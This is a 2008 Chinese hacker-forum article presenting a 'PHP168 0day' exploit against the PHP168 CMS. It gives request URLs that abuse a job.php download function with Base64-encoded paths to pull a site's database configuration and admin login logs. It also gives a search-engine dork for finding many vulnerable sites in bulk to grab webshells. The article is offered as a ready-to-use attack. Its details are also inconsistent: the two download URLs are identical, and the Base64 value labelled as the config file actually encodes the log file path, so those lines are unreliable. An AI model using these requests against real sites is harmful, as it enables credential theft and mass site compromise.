黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 脚本入侵 >> 正文
·没有路由密码权限时的鸽08-23·PHP168整站系统0DAY10-31
·ASPXshell MS08-067插件10-31·SA执行命令方法总结10-31
·神奇XT 让Windows图片查10-31·Vista系统EFS加密功能的10-31
·Windows 2008下应对驱动10-30·用U盘共享Windows vista10-29
·占用0%资源 HOST文件打造10-29·延长硬盘寿命!深入了解10-29
·响应MS08-067 Windows系10-29·一种防注入代码的绕过学10-28
·Ms08-067 Exp 详细测试流10-28·织梦(Dedecms)任意代码执10-28
·社工+提权艰难入侵某通信10-28·艰难入侵源码站并提权10-28
·MSN,QQ,网页总掉线该怎么10-27·入侵的10个小技巧10-27
·渗透(香港)劲舞团官方论10-27·教你巧用文本编辑器查找10-27
·上传漏洞之构造入侵10-27·某信息港的渗透入侵过程10-27
·入侵Phpcms网站管理系统10-27·入侵狐狸黑客学习网详细10-25
·Olympe Network提供100M10-25·告别Windows白屏 让窗口10-24
·对症下药,让IIS“植入”10-24·设计资源吧提供5GB免费p10-24
[推荐]PHP168整站系统0DAY
        ★★★★

PHP168整站系统0DAY

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-10-31 11:39:08
首先说明下是这个洞是在其他地方看到的,只是他没有说的很清楚,好多菜菜都不明白,我就拿这发我的第一个贴吧!
这个洞其实就是利用了程序的编码漏洞,下载配置和登陆日志文件,一下是利用方法。


下载 mysql_config.php 和 adminlogin_logs.php 两个文件到本地。

http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="

http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="

程序后台:http://dabei.org/admin/index.php?iframe=1

Base64加密代码:

http://dabei.org//cache/adminlogin_logs.php  ==  "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA==" (引号里面的是Base64加密后的)

http://dabei.org//php168/mysql_config.php  ==  "aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="  (引号里面的是Base64加密后的)

批量抓webshell:
google,baidu   输入关键字:Powered by PHP168
文章录入:cainiaowang    责任编辑:xinlian 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 【字体:
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886